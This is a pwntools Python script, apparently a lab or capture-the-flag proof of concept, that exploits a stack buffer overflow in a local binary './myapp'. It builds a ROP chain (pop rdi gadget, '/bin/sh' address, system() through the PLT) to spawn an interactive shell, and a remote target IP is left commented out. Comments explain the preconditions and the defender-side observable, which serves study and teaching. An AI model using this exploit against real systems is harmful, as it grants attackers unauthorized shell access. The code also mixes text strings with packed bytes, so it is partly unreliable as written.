# Reference ROP proof-of-concept (pwntools) against a local binary ./myapp.
# It overflows a 120-byte stack buffer and replaces the saved return address
# with a short chain that calls system() through its PLT entry.  Everything
# below depends on the binary having no stack canary and fixed (non-PIE)
# addresses: a canary breaks the overwrite before the return, and PIE/ASLR
# invalidates every hard-coded 0x40xxxx value.  From a defender's side the
# observable is the target process spawning a shell.
import pwn

# Hard-coded absolute addresses, packed as 64-bit little-endian (pwn.p64).
# The low, fixed 0x40xxxx values presumably mean the binary was built
# without PIE -- TODO confirm from the binary's headers.
plt_system = pwn.p64(0x401040)
plt_puts = pwn.p64(0x401030)        # assigned but never used in the chain below
pop_rdi = pwn.p64(0x40120b)         # presumably a `pop rdi; ret` gadget (argument setup)
main = pwn.p64(0x40115f)            # return target after system(), presumably to avoid a crash
buf_heap_addr = pwn.p64(0x405670)   # presumably where the "/bin/sh" string is expected to land; only stable without ASLR

# Payload: the command string first, padding up to the 120-byte offset,
# then the chain: pop rdi <- address of "/bin/sh"; call system; return to main.
buf = "/bin/sh\x00"
buf += "A" * (120 - len(buf))
buf += pop_rdi
buf += buf_heap_addr
buf += plt_system
buf += main

# Remote variant left commented out; the script as written runs the
# binary locally.
# p = pwn.remote("10.10.10.147", 1337)
p = pwn.process("./myapp")
p.recvline()        # consume the program's initial output before sending
p.sendline(buf)
p.interactive()     # hand the I/O to the user (a shell appears here if the chain works)